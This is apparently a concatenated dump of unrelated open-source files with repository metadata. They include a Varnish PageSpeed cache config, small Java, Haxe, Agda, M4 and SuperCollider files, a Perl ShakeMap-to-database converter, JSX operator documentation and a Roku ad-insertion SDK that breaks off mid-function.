# specific optimizations.
set req.http.PS-CapabilityList = req.http.default_ps_capability_list_for_large_screens;
# Cache-fragment 1: Desktop User-Agents that support lazyload_images (ll),
# inline_images (ii) and defer_javascript (dj).
# Note: Wget is added for testing purposes only.
if (req.http.User-Agent ~ "(?i)Chrome/|Firefox/|Trident/6\.|Safari|Wget") {
set req.http.PS-CapabilityList = "ll,ii,dj:";
}
# Cache-fragment 2: Desktop User-Agents that support lazyload_images (ll),
# inline_images (ii), defer_javascript (dj), webp (jw) and lossless_webp
# (ws).
if (req.http.Accept ~ "webp") {
set req.http.PS-CapabilityList = "ll,ii,dj,jw,ws:";
}
# Cache-fragment 3: This fragment contains (a) Desktop User-Agents that
# should not map to fragments 1 or 2 and (b) all tablet User-Agents. These
# will only get optimizations that work on all browsers and use image
# compression qualities applicable to large screens. Note that even tablets
# that are capable of supporting inline or webp images, for e.g. Android
# 4.1.2, will not get these advanced optimizations.
if (req.http.User-Agent ~ "(?i)Firefox/[1-2]\.|bot|Yahoo!|Ruby|RPT-HTTPClient|(Google \(\+https\:\/\/developers\.google\.com\/\+\/web\/snippet\/\))|Android|iPad|TouchPad|Silk-Accelerated|Kindle Fire") {
set req.http.PS-CapabilityList = req.http.default_ps_capability_list_for_large_screens;
}
# Cache-fragment 4: Mobiles and small screen tablets will use image
# compression qualities applicable to small screens, but all other
# optimizations will be those that work on all browsers.
if (req.http.User-Agent ~ "(?i)Mozilla.*Android.*Mobile*|iPhone|BlackBerry|Opera Mobi|Opera Mini|SymbianOS|UP.Browser|J-PHONE|Profile/MIDP|portalmmm|DoCoMo|Obigo|Galaxy Nexus|GT-I9300|GT-N7100|HTC One|Nexus [4|7|S]|Xoom|XT907") {
set req.http.PS-CapabilityList = req.http.default_ps_capability_list_for_small_screens;
}
# Remove placeholder header values.
remove req.http.default_ps_capability_list_for_large_screens;
remove req.http.default_ps_capability_list_for_large_screens;
}
sub vcl_hash {
# Block 3: Use the PS-CapabilityList value for computing the hash.
hash_data(req.http.PS-CapabilityList);
}
# Block 3a: Define ACL for purge requests
acl purge {
# Purge requests are only allowed from localhost.
"localhost";
"127.0.0.1";
}
# Block 3b: Issue purge when there is a cache hit for the purge request.
sub vcl_hit {
if (req.request == "PURGE") {
purge;
error 200 "Purged.";
} else {
# Send 5% of the HITs to the backend for instrumentation.
if (std.random(0, 100) <= 5) {
set req.http.PS-ShouldBeacon = req.http.ps_should_beacon_key_value;
return (pass);
}
}
}
# Block 3c: Issue a no-op purge when there is a cache miss for the purge
# request.
sub vcl_miss {
if (req.request == "PURGE") {
purge;
error 200 "Purged.";
} else {
# Send 25% of the MISSes to the backend for instrumentation.
if (std.random(0, 100) <= 25) {
set req.http.PS-ShouldBeacon = req.http.ps_should_beacon_key_value;
return (pass);
}
}
}
# Block 4: In vcl_recv, on receiving a request, call the method responsible for
# generating the User-Agent based key for hashing into the cache.
sub vcl_recv {
call generate_user_agent_based_key;
# We want to support beaconing filters, i.e., one or more of inline_images,
# lazyload_images, inline_preview_images or prioritize_critical_css are
# enabled. We define a placeholder constant called ps_should_beacon_key_value
# so that some percentages of hits and misses can be sent to the backend
# with this value used for the PS-ShouldBeacon header to force beaconing.
# This value should match the value of the DownstreamCacheRebeaconingKey
# pagespeed directive used by your backend server.
# WARNING: Do not use "random_rebeaconing_key" for your configuration, but
# instead change it to something specific to your site, to keep it secure.
set req.http.ps_should_beacon_key_value = "random_rebeaconing_key";
# Incoming PS-ShouldBeacon headers should not be allowed since this will allow
# external entities to force the server to instrument pages.
remove req.http.PS-ShouldBeacon;
# Block 3d: Verify the ACL for an incoming purge request and handle it.
if (req.request == "PURGE") {
if (!client.ip ~ purge) {
error 405 "Not allowed.";
}
return (lookup);
}
# Blocks which decide whether cache should be bypassed or not go here.
# Block 5a: Bypass the cache for .pagespeed. resource. PageSpeed has its own
# cache for these, and these could bloat up the caching layer.
if (req.url ~ "\.pagespeed\.([a-z]\.)?[a-z]{2}\.[^.]{10}\.[^.]+") {
# Skip the cache for .pagespeed. resource. PageSpeed has its own
# cache for these, and these could bloat up the caching layer.
return (pass);
}
# Block 5b: Only cache responses to clients that support gzip. Most clients
# do, and the cache holds much more if it stores gzipped responses.
if (req.http.Accept-Encoding !~ "gzip") {
return (pass);
}
}
# Block 6: Mark HTML uncacheable by caches beyond our control.
sub vcl_fetch {
if (beresp.http.Content-Type ~ "text/html") {
# Hide the upstream cache control headers.
remove beresp.http.ETag;
remove beresp.http.Last-Modified;
remove beresp.http.Cache-Control;
# Add no-cache Cache-Control header for html.
set beresp.http.Cache-Control = "no-cache, max-age=0";
}
return (deliver);
}
# Block 7: Add a header for identifying cache hits/misses.
sub vcl_deliver {
set resp.http.PS-CapabilityList = req.http.PS-CapabilityList;
if (obj.hits > 0) {
set resp.http.X-Cache = "HIT";
} else {
set resp.http.X-Cache = "MISS";
}
}
| VCL | 5 | PeterDaveHello/incubator-pagespeed-mod | install/debug_conf.v3.vcl | [
"Apache-2.0"
] |
{
"title": "Energi"
} | JSON | 0 | MrDelik/core | homeassistant/components/energy/translations/no.json | [
"Apache-2.0"
] |
protected String id0() {
StringBuilder splitJointId = new StringBuilder(String.valueOf(getTimeBucket()));
<#list fieldsFromSource as sourceField>
<#if sourceField.isID()>
splitJointId.append(org.apache.skywalking.oap.server.core.Const.ID_CONNECTOR)
.append(${sourceField.fieldName});
</#if>
</#list>
return splitJointId.toString();
}
| FreeMarker | 3 | sergicastro/skywalking | oap-server/oal-rt/src/main/resources/code-templates/metrics/id.ftl | [
"Apache-2.0",
"BSD-3-Clause"
] |
(
Server.default = Server.local;
~m = MonoM.new("/monome", 0);
s.waitForBoot({
~step = Array.fill(128, {0});
~m.useDevice(0);
OSCFunc.newMatching(
{ arg message, time, addr, recvPort;
if(message[3] == 1, {
var pos = message[1] + (message[2] * 16);
if(~step[pos] == 1,
{~step[pos] = 0},
{~step[pos] = 1}
);
d.value;
})
}, "/monome/grid/key");
d = {
for(0,7, {arg y;
for(0,15, {arg x;
~m.levset(x,y,~step[y*16+x] * 15);
})
})
};
});
) | SuperCollider | 3 | tonepaintingzack/docs | grid/studies/sc/files/grid-studies-2-4.scd | [
"CC-BY-4.0",
"MIT"
] |
dnl Copyright (c) Facebook, Inc. and its affiliates.
dnl
dnl This source code is licensed under the MIT license found in the
dnl LICENSE file in the root directory of this source tree.
dnl AC_ASSERT_PROG([program_name], [test_variable])
dnl
dnl fails if $test_variable is "no", which is taken to mean that
dnl $program_name is not installed
AC_DEFUN([AC_ASSERT_PROG],
[dnl
AS_IF([test "$2" = "no"],
[dnl
AC_MSG_ERROR([$1 not found.])
])
])
| M4 | 4 | JacobBarthelmeh/infer | m4/ac_assert_prog.m4 | [
"MIT"
] |
/*
* Copyright 2002-2020 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.r2dbc.core.binding;
/**
* Bind markers represent placeholders in SQL queries for substitution
* for an actual parameter. Using bind markers allows creating safe queries
* so query strings are not required to contain escaped values but rather
* the driver encodes parameter in the appropriate representation.
*
* <p>{@link BindMarkers} is stateful and can be only used for a single binding
* pass of one or more parameters. It maintains bind indexes/bind parameter names.
*
* @author Mark Paluch
* @since 5.3
* @see BindMarker
* @see BindMarkersFactory
* @see io.r2dbc.spi.Statement#bind
*/
@FunctionalInterface
public interface BindMarkers {
/**
* Create a new {@link BindMarker}.
*/
BindMarker next();
/**
* Create a new {@link BindMarker} that accepts a {@code hint}.
* Implementations are allowed to consider/ignore/filter
* the name hint to create more expressive bind markers.
* @param hint an optional name hint that can be used as part of the bind marker
* @return a new {@link BindMarker}
*/
default BindMarker next(String hint) {
return next();
}
}
| Java | 4 | spreoW/spring-framework | spring-r2dbc/src/main/java/org/springframework/r2dbc/core/binding/BindMarkers.java | [
"Apache-2.0"
] |
import haxe.macro.Expr;
final calls = [];
final builds = [];
macro function getCalls() {
return macro $v{calls};
}
macro function getBuilds() {
return macro $v{builds};
}
function c(name) {
calls.push(name);
}
function b(name) {
builds.push(name);
}
function lowerCase() {
c("lowerCase");
}
function UpperCase() {
c("UpperCase");
}
function build() {
b("build");
return [];
}
function Build() {
b("Build");
return [];
}
class Macro {
static function lowerCase() {
c("Macro.lowerCase");
}
static function UpperCase() {
c("Macro.UpperCase");
}
static function build() {
b("Macro.build");
return [];
}
static function Build() {
b("Macro.Build");
return [];
}
}
| Haxe | 4 | Alan-love/haxe | tests/misc/resolution/projects/modulestatics/Macro.hx | [
"MIT"
] |
module Issue676 where
data Bool : Set where
true false : Bool
data ⊥ : Set where
data Silly A : Set where
[_] : A → Silly A
fail : ⊥ → Silly A
-- This shouldn't be projection-like since the second clause won't reduce.
unsillify : ∀ {A} → Silly A → A
unsillify [ x ] = x
unsillify (fail ())
data _≡_ {A : Set}(x : A) : A → Set where
refl : x ≡ x
-- Triggers an __IMPOSSIBLE__ if unsillify is projection like.
bad : (x : ⊥) → unsillify (fail x) ≡ true
bad x = refl
| Agda | 3 | cruhland/agda | test/Fail/Issue676.agda | [
"MIT"
] |
class Foo
{
Void f03
This f04
Void[] f05
This[]? f06
Void:Obj f07
[Obj:This]? f08
|This|? f09
|->This| f10
|Void| f11
|Obj,Void| f12
|->This[]?| f13
} | Fantom | 0 | fanx-dev/fanx | compiler/testCompilerx/res/checkErrors/testValidTypes1.fan | [
"AFL-3.0"
] |
# Copyright (c) 2004 Boulder Real Time Technologies, Inc.
# All rights reserved.
#
# Written by Dr. Kent Lindquist, Lindquist Consulting, Inc.
#
# This software may be used freely in any way as long as
# the copyright statement above is not removed.
use Datascope;
use XML::LibXML;
sub process_channel {
my( $channel ) = @_;
$chan = $channel->getAttribute( "name" );
if( dbfind( @dbsitechan, "sta == \"$sta\" && chan == \"$chan\"" ) < 0 ) {
dbaddv( @dbsitechan, "sta", $sta,
"chan", $chan,
"ondate", "1970001" );
}
foreach $tagname ( "acc", "vel", "psa03", "psa10", "psa30" ) {
foreach $mynode ( $channel->getChildrenByTagName( $tagname ) ) {
$xmlvalue = $mynode->getAttribute( "value" );
if( $tagname eq "acc" ) {
$val = $xmlvalue * 10;
$units = "mg";
$meastype = "peaka";
} elsif( $tagname =~ /psa../ ) {
$val = $xmlvalue * 10;
$units = "mg";
$meastype = $tagname;
} elsif( $tagname eq "vel" ) {
$val = $xmlvalue;
$units = "cm/s";
$meastype = "peakv";
}
$dbwfmeas[3] = dbaddnull( @dbwfmeas );
dbputv( @dbwfmeas, "sta", $sta,
"chan", $chan,
"meastype", $meastype,
"filter", "UNKNOWN",
"time", $windowstart,
"endtime", $windowend,
"arid", $arid,
"val1", $val,
"units1", $units );
}
}
}
sub process_station {
my( $station ) = @_;
$sta = $station->getAttribute( "code" );
$staname = $station->getAttribute( "name" );
$slat = $station->getAttribute( "lat" );
$slon = $station->getAttribute( "lon" );
$source = $station->getAttribute( "source" );
$commtype = $station->getAttribute( "commtype" );
$insttype = $station->getAttribute( "insttype" );
if( length( $sta ) > 6 ) {
print STDERR "$sta exceeds 6 chars, skipping\n";
return;
} elsif( dbfind( @dbsite, "sta == \"$sta\"" ) < 0 ) {
dbaddv( @dbsite, "sta", $sta,
"ondate", "1970001",
"lat", $slat,
"lon", $slon,
"staname", $staname );
}
$delta = dbex_eval( @dbsite, "distance( $olat, $olon, $slat, $slon )" );
$ptime = dbex_eval( @dbsite, "pphasetime( $delta, $odepth )" );
$stime = dbex_eval( @dbsite, "sphasetime( $delta, $odepth )" );
$window = 2 * ( $stime - $ptime );
$windowstart = $origintime + $ptime;
$windowend = $windowstart + $window;
$phase = "+P";
$mytime = sprintf( "%17.5lf", $windowstart );
if( ( $row = dbfind( @dbarrival, "sta == \"$sta\" && time == $mytime" ) ) < 0 ) {
$arid = dbnextid( @dbarrival, "arid" );
dbaddv( @dbarrival, "sta", $sta,
"time", $windowstart,
"arid", $arid,
"iphase", $phase );
dbaddv( @dbassoc, "sta", $sta,
"arid", $arid,
"orid", $orid,
"phase", $phase );
} else {
@dbtemp = @dbarrival;
$dbtemp[3] = $row;
$arid = dbgetv( @dbtemp, "arid" );
}
foreach $channel ( $station->findnodes( "comp" ) ) {
process_channel( $channel );
}
}
if( $#ARGV < 1 ) {
die( "Usage: shakemapxml2db xmlfile [xmlfile...] dbname\n" );
} else {
$dbname = pop( @ARGV );
}
$|++;
@db = dbopen( $dbname, "r+" );
@dborigin = dblookup( @db, "", "origin", "", "" );
@dbevent = dblookup( @db, "", "event", "", "" );
@dbsite = dblookup( @db, "", "site", "", "" );
@dbsitechan = dblookup( @db, "", "sitechan", "", "" );
@dbarrival = dblookup( @db, "", "arrival", "", "" );
@dbassoc = dblookup( @db, "", "assoc", "", "" );
@dbwfmeas = dblookup( @db, "", "wfmeas", "", "" );
@dblastid = dblookup( @db, "", "lastid", "", "" );
if( dbfind( @dblastid, "keyname == \"evid\"" ) < 0 ) {
# prepare for non-numeric IDs
dbaddv( @dblastid, "keyname", "orid", "keyvalue", 0 );
dbaddv( @dblastid, "keyname", "evid", "keyvalue", 0 );
}
foreach $xmlfile ( @ARGV ) {
print "Processing $xmlfile..";
my $parser = XML::LibXML->new();
my $doc = $parser->parse_file( "$xmlfile" );
print "..";
$quake = $doc->documentElement->findnodes( "earthquake" )->get_node(1);
$day = $quake->getAttribute( "day" );
$month = $quake->getAttribute( "month" );
$year = $quake->getAttribute( "year" );
$hour = $quake->getAttribute( "hour" );
$minute = $quake->getAttribute( "minute" );
$second = $quake->getAttribute( "second" );
$timezone = $quake->getAttribute( "timezone" );
$origintime = str2epoch( "$month/$day/$year $hour:$minute:$second $timezone" );
$olat = $quake->getAttribute( "lat" );
$olon = $quake->getAttribute( "lon" );
$odepth = $quake->getAttribute( "depth" );
if( ( $id = $quake->getAttribute( "id" ) ) =~ /^\d+$/ ) {
$orid = $quake->getAttribute( "id" );
$evid = $quake->getAttribute( "id" );
} else {
$trimid = substr( $id, 0, 15 );
if( dbfind( @dbevent, "evname == \"$trimid\"" ) < 0 ) {
$orid = dbnextid( @dbarrival, "orid" );
$evid = dbnextid( @dbarrival, "evid" );
} else {
print "already done\n";
next;
}
}
if( dbfind( @dborigin, "orid == $orid", -1 ) >= 0 ) {
print "already done\n";
next;
}
dbaddv( @dborigin, "lat", $olat,
"lon", $olon,
"depth", $odepth,
"time", $origintime,
"ml", $quake->getAttribute( "mag" ),
"orid", $orid,
"evid", $evid );
dbaddv( @dbevent, "evid", $evid,
"prefor", $orid,
"evname", $id );
foreach $station (
$doc->documentElement->findnodes( "stationlist/station" )
) {
process_station( $station );
}
print "done\n";
}
| XProc | 4 | jreyes1108/antelope_contrib | nobuild/bin/gme/shakemapxml2db/shakemapxml2db.xpl | [
"BSD-2-Clause",
"MIT"
] |
? my $context = $main::context;
? $_mt->wrapper_file("wrapper.mt")->(sub {
<title>Operators - Documents - JSX</title>
?= $_mt->render_file("header.mt")
?= $_mt->render_file("breadcrumb.mt", [ qw(Documents doc.html) ], [ "Operators" ])
<div id="main">
<h2>Operators</h2>
<p>
The operators of JSX are the same to those in JavaScript (ECMA-262 3rd edition) except for the following changes.
</p>
<ul>
<li>types of the operands accepted by the operators are more restrictive</li>
<li>logical operators (&& ||) return boolean</li>
<li>binary ?: operator has been introduced (to cover the use of || in JavaScript to return non-boolean values)</li>
<li>introduction of the as operator</li>
<li>delete is a statement instead of an operator</li>
</ul>
<p>The table below lists the operators supported by JSX.</p>
<table>
<caption>Table 1. List of Operators by Precedence</caption>
<tr><th>Operator</th><th>Returned Type</th><th>Operand Type(s)</th></tr>
<tr>
<td>(x)<?= $context->{note}->("grouping operator") ?></td>
<td>typeof x</td>
<td></td>
</tr>
<tr>
<td>func(...)</td>
<td>return type of the function</td>
<td></td>
</tr>
<tr>
<td>obj.prop</td>
<td>typeof obj.prop</td>
<td>obj: any object type</td>
</tr>
<tr>
<td>array[index]</td>
<td>Nullable.<T></td>
<td>array: Array.<T><br />index: number</td>
</tr>
<tr>
<td>map[key]</td>
<td>Nullable.<T></td>
<td>map: Map.<T><br />key: string</td>
</tr>
<tr>
<td>x++<br />x--</td>
<td>typeof x</td>
<td>number or int</td>
</tr>
<tr>
<td>obj instanceof <i>type</i></td>
<td>boolean</td>
<td>obj: any object type<br />type: a Class, Interface, or Mixin</td>
</tr>
<tr>
<td nowrap>x as <i>type</i><?= $context->{note}->("cast operator; in debug mode (i.e. unless --release or --disable-type-check is specified) raises an assertion failure when a invalid cast between object types are detected") ?><br />x as __noconvert__ <i>type</i><?= $context->{note}->("cast operator (simply changes the type of the value recognized by the compiler)") ?></td>
<td><i>type</i></td>
<td></td>
</tr>
<tr>
<td>++x<br />--x</td>
<td>typeof x</td>
<td>number or int</td>
</tr>
<tr>
<td>+x<br />-x</td>
<td>typeof x</td>
<td>number or int</td>
</tr>
<tr>
<td>~x</td>
<td>int</td>
<td>number or int</td>
</tr>
<tr>
<td>! x</td>
<td>boolean</td>
<td>any</td>
</tr>
<tr>
<td>typeof x</td>
<td>string</td>
<td>variant</td>
</tr>
<tr>
<td>x * y<br />x % y</td>
<td>number or int<?= $context->{note}->("int is returned if both operands are int") ?></td>
<td>number or int</td>
</tr>
<tr>
<td>x / y</td>
<td>number</td>
<td>number or int</td>
</tr>
<tr>
<td>x + y<br />x - y</td>
<td>number or int<?= $context->{note}->(-1) ?></td>
<td>number or int</td>
</tr>
<tr>
<td>x + y</td>
<td>string</td>
<td>string</td>
</tr>
<tr>
<td>x << y<br />x >> y<br />x >>> y</td>
<td>int</td>
<td>number or int</td>
</tr>
<tr>
<td>x < y<br />x<= y<br />x > y<br />x >= y</td>
<td>boolean</td>
<td>number, int, string<?= $context->{note}->("types of x and y should be equal, or either should be convertible to the other") ?></td></td>
</tr>
<tr>
<td>x in y</td>
<td>boolean</td>
<td>x: string<br />y: Map.<T></td>
</tr>
<tr>
<td>x == y<br />x != y</td>
<td>boolean</td>
<td>any except variant<?= $context->{note}->(-1) ?></td>
</tr>
<tr>
<td>x & y</td>
<td>int</td>
<td>number or int</td>
</tr>
<tr>
<td>x ^ y</td>
<td>int</td>
<td>number or int</td>
</tr>
<tr>
<td>x | y</td>
<td>int</td>
<td>number or int</td>
</tr>
<tr>
<td>x && y</td>
<td>boolean</td>
<td>any</td>
</tr>
<tr>
<td>x || y</td>
<td>boolean</td>
<td>any</td>
</tr>
<tr>
<td>x ? y : z</td>
<td>typeof y</td>
<td>any<?= $context->{note}->("types of y and z should be equal, or either should be convertible to the other") ?></td>
</tr>
<tr>
<td>x ?: y</td>
<td>typeof x</td>
<td>any<?= $context->{note}->(-2) ?></td>
</tr>
<tr>
<td>x = y</td>
<td>typeof x</td>
<td>any<?= $context->{note}->("type of y should be convertible to type of x") ?></td>
</tr>
<tr>
<td>x <i>op</i><?= $context->{note}->("any of: * / % + - << >> >>> & ^ |") ?>= y</td>
<td>typeof x</td>
<td>same as <i>op</i></td>
</tr>
<tr>
<td>x, y</td>
<td>typeof y</td>
<td>any</td>
</tr>
</table>
?= $context->{citations}->()
</div>
? })
| Mathematica | 4 | monkpit/JSX | doc/src/doc/operatorref.mt | [
"MIT"
] |
button.flag-button.btn.btn-lg.green-flag(title="G: Place a green flag")
span.glyphicon.glyphicon-flag
span.flag-caption
span.flag-shortcut G
| reen
button.flag-button.btn.btn-lg.black-flag(title="B: Place a black flag")
span.glyphicon.glyphicon-flag
span.flag-caption
span.flag-shortcut B
| lack
button.flag-button.btn.btn-lg.violet-flag(title="V: Place a violet flag")
span.glyphicon.glyphicon-flag
span.flag-caption
span.flag-shortcut V
| iolet
| Jade | 2 | cihatislamdede/codecombat | app/templates/play/level/level-flags-view.jade | [
"CC-BY-4.0",
"MIT"
] |
' ********** Copyright 2019 Roku, Inc. All Rights Reserved. **********
function RAFX_getSSAIPluginBase(params as object) as Object
daisdk = {}
daisdk.init = function(params=invalid as object) as Void
m.createImpl()
m.createEventCallbacks()
m.updateLocale()
m.logLevel = 0
if invalid <> params
if invalid <> params["logLevel"] then m.logLevel = params.logLevel
end if
end function
daisdk.requestStream = function(requestObj as object) as object
status = {}
ret = m.impl.requestPreplay(requestObj)
if ret <> invalid and ret["error"] <> invalid
status["error"] = ret["error"]
end if
return status
end function
daisdk.getStreamInfo = function() as object
return m.impl.getStreamInfo()
end function
daisdk.setStreamInfo = function(streamInfo as object) as object
return m.impl.setStreamInfo(streamInfo)
end function
daisdk.enableAds = function(params as object) as void
m.impl.enableAds(params)
end function
daisdk.addEventListener = function(event as string, callback as function) as Void
m.eventCallbacks.addEventListener(event, callback)
end function
daisdk.onMessage = function(msg as object) as object
return m.impl.onMessage(msg)
end function
daisdk.onSeekSnap = function(seekRequest as object) as double
return m.impl.onSeekSnap(seekRequest)
end function
daisdk.isInteractive = function(curAd as object) as boolean
return m.impl.isInteractive(curAd)
end function
daisdk.command = function(params as object) as object
return m.impl.command(params)
end function
daisdk.createEventCallbacks = function() as object
obj = m.createDAIObject("eventCallbacks")
obj.callbacks = {}
return obj
end function
evtcll = {}
evtcll.addEventListener = function(event as string, callback as function) as Void
m.callbacks[event] = callback
end function
evtcll.doCall = function(event as string, adInfo as object) as Void
if invalid <> m.callbacks[event]
func = getglobalaa()["callFunctionInGlobalNamespace"]
func(m.callbacks[event], adInfo)
end if
end function
evtcll.errCall = function(errid as integer, errInfo as string) as Void
ERROR = m.sdk.CreateError()
ERROR.id = errid
ERROR.info = errInfo
dd = getglobalaa()["callFunctionInGlobalNamespace"]
dd(m.sdk.AdEvent.ERROR, ERROR)
end function
daisdk["eventCallbacks"] = evtcll
daisdk.createImpl = function() as object
obj = m.createDAIObject("impl")
obj.strmURL = ""
obj.prplyInfo = invalid
obj.wrpdPlayer = invalid
obj.loader = invalid
obj.streamManager = invalid
obj.useStitched = true
adIface = m.getRokuAds()
return obj
end function
impl = {}
impl.setStreamInfo = function(streamInfo as object) as void
end function
impl.parsePrplyInfo = function() as object
m.sdk.log("parsePrplyInfo() To be overridden")
return {adOpportunities:0, adBreaks:[]}
end function
impl.enableAds = function(params as object) as Void
ei = false
if type(params["player"]) = "roAssociativeArray"
player = params["player"]
if player.doesexist("port") and player.doesexist("sgnode")
ei = true
end if
m.wrpdPlayer = player
end if
m.useStitched = (invalid = params["useStitched"] or params["useStitched"])
if m.useStitched
adIface = m.sdk.getRokuAds()
adIface.stitchedAdsInit([])
end if
if not ei
m.sdk.log("Warning: Invalid object for interactive ads.")
return
end if
m.setRAFAdPods(params["ads"])
end function
impl.setRAFAdPods = function(adbreaksGiven = invalid as object) as Void
adBreaks = adbreaksGiven
if invalid = adbreaksGiven
pTimer = createObject("roTimespan")
parseResults = m.parsePrplyInfo()
adBreaks = parseResults.adBreaks
if m.loader["xResponseTime"] <> invalid
m.sdk.logToRAF("ValidResponse", {ads:adBreaks,slots:parseResults.adOpportunities,responseTime:m.loader.xResponseTime, parseTime:pTimer.totalMilliseconds(), url:m.loader.strmURL, adServers:invalid})
m.loader.xResponseTime = invalid
end if
end if
if 0 < adBreaks.count()
if m.useStitched
adIface = m.sdk.getRokuAds()
adIface.stitchedAdsInit(adBreaks)
m.sdk.log(["impl.setRAFAdPods() adBreaks set to RAF. renderTime: ",adBreaks[0].renderTime.tostr()], 5)
end if
m.sdk.eventCallbacks.doCall(m.sdk.AdEvent.PODS, {event:m.sdk.AdEvent.PODS, adPods:adBreaks})
end if
if invalid = m.streamManager then m.streamManager = m.sdk.createStreamManager()
m.streamManager.createTimeToEventMap(adBreaks)
end function
impl.onMetadata = function(msg as object) as void
end function
impl.onPosition = function (msg as object) as void
m.streamManager.onPosition(msg)
end function
impl.onMessage = function(msg as object) as object
msgType = m.sdk.getMsgType(msg, m.wrpdPlayer)
if msgType = m.sdk.msgType.FINISHED
m.sdk.log("All video is completed - full result")
m.sdk.eventCallbacks.doCall(m.sdk.AdEvent.STREAM_END, {})
else if msgType = m.sdk.msgType.METADATA
m.onMetadata(msg)
else if msgType = m.sdk.msgType.POSITION
m.onPosition(msg)
end if
curAd = m.msgToRAF(msg)
if invalid <> m.prplyInfo and msgType = m.sdk.msgType.POSITION
m.streamManager.onMessageVOD(msg, curAd)
m.onMessageLIVE(msg, curAd)
else if msgType = m.sdk.msgType.FINISHED
m.streamManager.deinit()
end if
return curAd
end function
impl.onSeekSnap = function(seekRequest as object) as double
if invalid = m.prplyInfo or m.prplyInfo.strmType <> m.sdk.StreamType.VOD or invalid = m.streamManager then return seekRequest.time
return m.streamManager.onSeekSnap(seekRequest)
end function
impl.onMessageLIVE = function(msg as object, curAd as object) as void
if m.sdk.StreamType.LIVE <> m.prplyInfo.strmType then return
end function
impl.msgToRAF = function(msg as object) as object
if m.useStitched
adIface = m.sdk.getRokuAds()
return adIface.stitchedAdHandledEvent(msg, m.wrpdPlayer)
end if
return invalid
end function
impl.requestPreplay = function(requestObj as object) as object
ret = {}
if invalid = m.loader
m.loader = m.createLoader(requestObj.type)
end if
jsn = m.loader.requestPreplay(requestObj)
if type(jsn) = "roAssociativeArray"
m.prplyInfo = jsn
else if jsn <> ""
m.prplyInfo = parsejson(jsn)
end if
if m.prplyInfo <> invalid
if requestObj["testAds"] <> invalid
ads = ReadAsciiFile(requestObj.testAds)
if ads <> invalid
m.prplyInfo.ads = parsejson(ads)
else
m.sdk.log(requestObj.testAds + " may not be valid JSON")
end if
end if
m.prplyInfo["strmType"] = requestObj.type
m.loader.composePingURL(m.prplyInfo)
else
m.prplyInfo = {strmType:requestObj.type}
ret["error"] = "No valid response from "+requestObj.url
end if
return ret
end function
impl.createLoader = function(live_or_vod as string) as object
m.loader = m.sdk.createLoader(live_or_vod)
return m.loader
end function
impl.isInteractive = function(curAd as object) as boolean
return m.streamManager.isInteractive(curAd)
end function
impl.command = function(params as object) as object
ret = invalid
if m.useStitched and "exitPod" = params.cmd
ret = m.exitPod(params)
end if
return ret
end function
impl.exitPod = function(params as object) as object
curAd = invalid
strmMgr = m.streamManager
if invalid <> params.curAd and invalid <> strmMgr.currentAdBreak and not strmMgr.isInteractive(params.curAd)
msg = {
getData : function()
return 0
end function
getField : function() as string
return "keypressed"
end function
isRemoteKeyPressed : function() As Boolean
return true
end function
GetIndex : function() As Integer
return 0
end function
IsScreenClosed : function() As Boolean
return false
end function
}
curAd = m.msgToRAF(msg)
adIface = m.sdk.getRokuAds()
adIface.stitchedAdsInit([])
end if
return curAd
end function
daisdk["impl"] = impl
daisdk.createLoader = function(live_or_vod as string) as object
obj = m.createDAIObject(live_or_vod+"loader")
obj.strmURL = ""
return obj
end function
liveloader = {}
liveloader.ping = function(param as dynamic) as void
m.sdk.log("liveloader.ping() To be overridden")
end function
daisdk["liveloader"] = liveloader
vodloader = {}
vodloader.ping = function(param as dynamic) as void
end function
vodloader.composePingURL = function(prplyInfo as object) as void
end function
vodloader.requestPreplay = function(requestObj as object) as dynamic
if not m.isValidString(m.strmURL)
m.strmURL = requestObj.url
end if
return m.getJSON(requestObj)
end function
vodloader.isValidString = function(ue as dynamic) as boolean
ve = type(ue)
if ve = "roString" or ve = "String"
return len(ue) > 0
end if
return false
end function
vodloader.getJSON = function(params as object) as string
xfer = m.sdk.createUrlXfer(m.sdk.httpsRegex.isMatch(params.url))
xfer.setUrl(params.url)
port = createObject("roMessagePort")
xfer.setPort(port)
xfer.addHeader("Accept", "application/json, application/xml")
if invalid <> params["headers"]
for each item in params["headers"].items()
xfer.addHeader(item.key, item.value)
end for
end if
xTimer = createObject("roTimespan")
if params["retry"] <> invalid then m.sdk.logToRAF("Request", params)
xTimer.mark()
if invalid <> params["body"]
xfer.asyncPostFromString(params.body)
else
xfer.asyncGetToString()
end if
timeoutsec = 4
if invalid <> params["timeoutsec"]
timeoutsec = params["timeoutsec"]
end if
msg = port.waitMessage(timeoutsec*1000)
xTime = xTimer.totalMilliseconds()
if msg = invalid
m.sdk.logToRAF("ErrorResponse", {error: "no response",
time: xTime, label: "Primary", url:params.url})
m.sdk.log("Msg is invalid. Possible timeout on loading URL")
return ""
else if type(msg) = "roUrlEvent"
wi = msg.getResponseCode()
if 200 <> wi and 201 <> wi
m.sdk.logToRAF("EmptyResponse", {error: msg.getfailurereason(),
time: xTime, label: "Primary", url:params.url})
m.sdk.log(["Transfer url: ", params.url, " failed, got code: ", wi.tostr(), " reason: ", msg.getfailurereason()])
return ""
end if
if params["retry"] <> invalid then m.xResponseTime = xTime
return msg.getString()
else
m.sdk.log("Unknown Ad Request Event: " + type(msg))
end if
return ""
end function
daisdk["vodloader"] = vodloader
daisdk.createStreamManager = function() as object
obj = m.createDAIObject("streamManager")
obj.adTimeToEventMap = invalid
obj.adTimeToBreakMap = invalid
obj.adTimeToBeginEnd = invalid
obj.crrntPosSec = -1
obj.lastPosSec = -1
obj.whenAdBreakStart = -1
obj.currentAdBreak = invalid
return obj
end function
strmMgr = {}
strmMgr.addEventToEvtMap = function(timeToEvtMap as object, timeKey as string, evtStr as string) as void
if timeToEvtMap[timeKey] = invalid
timeToEvtMap[timeKey] = [evtStr]
else
eExist = false
for each e in timeToEvtMap[timeKey]
eExist = eExist or (e = evtStr)
end for
if not eExist
timeToEvtMap[timeKey].push(evtStr)
end if
end if
end function
strmMgr.createTimeToEventMap = function(adBreaks as object) as Void
if adBreaks = invalid
m.adTimeToEventMap = invalid
m.adTimeToBreakMap = invalid
m.adTimeToBeginEnd = invalid
return
end if
timeToEvtMap = {}
timeToBreakMap = {}
timeToBeginEnd = []
for each adBreak in adBreaks
brkBegin = int(adBreak.renderTime)
